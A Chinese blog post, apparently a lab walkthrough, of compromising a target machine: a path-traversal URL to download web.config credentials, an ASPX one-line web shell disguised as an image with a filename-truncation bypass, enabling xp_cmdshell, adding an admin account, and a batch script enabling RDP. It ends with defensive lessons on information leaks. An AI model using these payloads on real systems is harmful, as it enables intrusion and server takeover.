<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="alternate" href="/atom.xml" title="ClearLoveの博客" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="仅知道靶机的ip是172.16.12.131，现在需要一步步去获取更多的信息。一、获取靶机的登录权限：1、探测靶机开放端口：发现1433端口开放。1433对应mssqlserver数据库服务。">
<meta name="keywords" content="提权">
<meta property="og:type" content="article">
<meta property="og:title" content="案例一提权">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2019&#x2F;11&#x2F;18&#x2F;%E6%A1%88%E4%BE%8B%E4%B8%80%E6%8F%90%E6%9D%83&#x2F;index.html">
<meta property="og:site_name" content="ClearLoveの博客">
<meta property="og:description" content="仅知道靶机的ip是172.16.12.131，现在需要一步步去获取更多的信息。一、获取靶机的登录权限：1、探测靶机开放端口：发现1433端口开放。1433对应mssqlserver数据库服务。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-4.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-5.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-7.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-8.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-9.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-10.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-11.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-12.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-13.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-14.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-15.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-16.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-17.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-18.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-19.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-20.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-21.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-22.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-23.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-24.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-25.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-26.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-27.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-28.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-29.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-30.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-31.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-32.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-33.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-34.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-35.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-36.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-37.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-38.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-39.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-40.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-41.png">
<meta property="og:updated_time" content="2019-11-21T05:56:44.918Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;pasted-4.png">

<link rel="canonical" href="http://yoursite.com/2019/11/18/%E6%A1%88%E4%BE%8B%E4%B8%80%E6%8F%90%E6%9D%83/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>案例一提权 | ClearLoveの博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ClearLoveの博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">我们称之为路的，其实不过是彷徨</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/18/%E6%A1%88%E4%BE%8B%E4%B8%80%E6%8F%90%E6%9D%83/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="魏超">
      <meta itemprop="description" content="胡歌">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ClearLoveの博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          案例一提权
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-18 15:38:33" itemprop="dateCreated datePublished" datetime="2019-11-18T15:38:33+08:00">2019-11-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-11-21 13:56:44" itemprop="dateModified" datetime="2019-11-21T13:56:44+08:00">2019-11-21</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%8F%90%E6%9D%83/" itemprop="url" rel="index">
                    <span itemprop="name">提权</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>仅知道靶机的ip是172.16.12.131，现在需要一步步去获取更多的信息。</p><p>一、获取靶机的登录权限：<br>1、探测靶机开放端口：</p><p><img src="/images/pasted-4.png" alt="upload successful"><br>发现1433端口开放。1433对应mssqlserver数据库服务。</p><a id="more"></a>


<p>2、继续探测非默认服务端口，发现27689端口对外开放</p>
<p><img src="/images/pasted-5.png" alt="upload successful"></p>
<p>3、尝试用浏览器访问，发现是web服务端口，打开网页如下：</p>
<p><img src="/images/pasted-7.png" alt="upload successful"></p>
<p>4、可以尝试暴力破解用户名和密码，或者尝试用后台扫描工具扫描网站。暴力破解费时费力，成功率不高，所以优先扫描网站后台：</p>
<p><img src="/images/pasted-8.png" alt="upload successful"></p>
<p>检查发现的后台文件，发现robots.txt文件，双击打开<a href="http://172.16.12.131:27689/robots.txt" target="_blank" rel="noopener">http://172.16.12.131:27689/robots.txt</a><br>内容如下：<br><img src="/images/pasted-9.png" alt="upload successful"></p>
<p>5、从robots.txt发现2个aspx页面，访问其中file_down.aspx页面如下：</p>
<p><img src="/images/pasted-10.png" alt="upload successful"></p>
<p>从出错信息可以看到下载目录是/upfile/affix，使用../../可以到达网站根目录。一般情况下，.net网站的配置文件是web.config，尝试使用下载页面下载web.config文件：<br>构造下载链接：<a href="http://172.16.12.131:27689/admin/file_down.aspx?file=../../web.config" target="_blank" rel="noopener">http://172.16.12.131:27689/admin/file_down.aspx?file=../../web.config</a></p>
<p><img src="/images/pasted-11.png" alt="upload successful"></p>
<p>成功拿到当前网站的数据库用户和密码。</p>
<p><img src="/images/pasted-12.png" alt="upload successful"><br>6、使用navicat访问数据库，拿到admin的密码（如果是md5加密，也可以手动设置新密码，将新密码的md5值存到数据库）</p>
<p><img src="/images/pasted-13.png" alt="upload successful"></p>
<p><img src="/images/pasted-14.png" alt="upload successful"></p>
<p><img src="/images/pasted-15.png" alt="upload successful"><br>7、使用admin帐号和密码成功登录页面：<br><img src="/images/pasted-16.png" alt="upload successful"></p>
<p>二、获取靶机服务器webshell权限<br>1、访问网站的各个页面，寻找有用信息。</p>
<p><img src="/images/pasted-17.png" alt="upload successful"> </p>
<p><img src="/images/pasted-18.png" alt="upload successful"><br>1）    系统对上传文件进行简单过滤，允许上传图像文件。<br>2）    文件名最长为32位字符，超过这一长度将进行截断</p>
<p>2、根据上面两条信息可以上传木马从而拿到webshell权限<br>1）制作包含一句话木马的图像文件：<br>新建a.txt:<br>写入GIF89a &lt;%@ Page Language=”Jscript”%&gt;&lt;%eval(Request.Item[“z”],”unsafe”);%&gt;<br>修改a.txt为a.jpg<br>2）上传任一超长文件名文件，发现新生成的文件名前19位是系统生成，后13位是从原文件名里截取。所以将a.jpg修改为12345678.aspx.jpg，其中前13位正好是12345678.aspx。上传12345678.aspx.jpg，最终得到后台文件637084795826686250-12345678.aspx。<br>3）使用中国菜刀连接木马：</p>
<p><img src="/images/pasted-19.png" alt="upload successful"></p>
<p><img src="/images/pasted-20.png" alt="upload successful"></p>
<p>三、提权并开启远程桌面访问，获取服务器管理权限<br>1、目前只能拿到web网站的权限，权限是”network service”，无法访问管理员目录，见下图：</p>
<p><img src="/images/pasted-21.png" alt="upload successful"></p>
<p>2、从网站后台文件查找信息，发现bak文件里有sa用户的密码:</p>
<p><img src="/images/pasted-22.png" alt="upload successful"></p>
<p><img src="/images/pasted-23.png" alt="upload successful"></p>
<p>3、使用navicat工具连接数据库</p>
<p><img src="/images/pasted-24.png" alt="upload successful"><br>4、开启sqlserver的xp_cmdshell功能</p>
<p><img src="/images/pasted-25.png" alt="upload successful"></p>
<p>5、“sa”具有 管理员权限</p>
<p><img src="/images/pasted-26.png" alt="upload successful"><br>6、新建帐号test，并转到administrators组（也可以直接net user administrator 123456强行修改administrator帐号密码）</p>
<p><img src="/images/pasted-27.png" alt="upload successful"></p>
<p><img src="/images/pasted-28.png" alt="upload successful"></p>
<p><img src="/images/pasted-29.png" alt="upload successful"></p>
<p>7、通过菜刀上传开启3389端口的.bat文件，上传到D:\web\upfile\affix\目录下：<br>3389.bat：<br>echo Windows Registry Editor Version 5.00&gt;&gt;3389.reg<br>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]&gt;&gt;3389.reg<br>echo “fDenyTSConnections”=dword:00000000&gt;&gt;3389.reg<br>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]&gt;&gt;3389.reg<br>echo “PortNumber”=dword:00000d3d&gt;&gt;3389.reg<br>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]&gt;&gt;3389.reg<br>echo “PortNumber”=dword:00000d3d&gt;&gt;3389.reg<br>regedit /s 3389.reg<br>del 3389.reg</p>
<p>8、开启3389端口，并关闭本机防火墙</p>
<p><img src="/images/pasted-30.png" alt="upload successful"></p>
<p><img src="/images/pasted-31.png" alt="upload successful"></p>
<p>9、远程桌面连接系统，具有管理员权限，可以随意对服务器进行操作。</p>
<p><img src="/images/pasted-32.png" alt="upload successful"></p>
<p><img src="/images/pasted-33.png" alt="upload successful"></p>
<p>二、第二种提权方法<br>拿到’shell’后，执行whoami，发现权限较低，尝试提权</p>
<p><img src="/images/pasted-34.png" alt="upload successful"><br>1、首先systeminfo查看系统补丁情况，可参考如下图所示补丁对应的提权</p>
<p><img src="/images/pasted-35.png" alt="upload successful"></p>
<p><img src="/images/pasted-36.png" alt="upload successful"><br>2、发现可以pr提权，上传pr和cmd到可读可写目录，设置上传后的cmd的路径为终端路径（setp “上传后的路径地址”）</p>
<p><img src="/images/pasted-37.png" alt="upload successful"><br>3、发现pr可以执行whoami，但无法执行net user（提示拒绝访问，说明net命令无权限），上传net到pr工具同一目录下就可以执行了</p>
<p><img src="/images/pasted-38.png" alt="upload successful"></p>
<p><img src="/images/pasted-39.png" alt="upload successful"></p>
<p>4、到这提权基本结束了，拿到system权限，修改administrator的密码，开3389登录拿到’key’</p>
<p><img src="/images/pasted-40.png" alt="upload successful"></p>
<p><img src="/images/pasted-41.png" alt="upload successful"><br>至此，拿到了服务器的最高权限。对这个过程进行回顾，发现信息泄漏起到了很关键的作用，而这些泄漏方式在实际研发过程中是普遍存在的，比如在robots.txt文件里泄漏了后台页面的名字，比如将备份的配置文件.bak保留在原地，比如提示提示文件名截断的说明信息等等。<br>如果说应用系统本身存在的上传下载等漏洞是技术（能力）上的硬伤，那这些信息泄漏就是工作习惯（态度）上的软伤。安全加固，需要从技术和开发习惯两方面共同下功夫，两手抓两手都要硬。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%8F%90%E6%9D%83/" rel="tag"># 提权</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/11/15/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%93%E4%B8%9A%E6%9C%AF%E8%AF%AD/" rel="next" title="网络安全专业术语">
                  <i class="fa fa-chevron-left"></i> 网络安全专业术语
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/11/18/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B/" rel="prev" title="渗透测试流程">
                  渗透测试流程 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="魏超"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">魏超</p>
  <div class="site-description" itemprop="description">胡歌</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">魏超</span>
</div>
  <!--<div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.0.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.5.0
  </div>
--!>

        












        
      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/clicklove.js"></script>
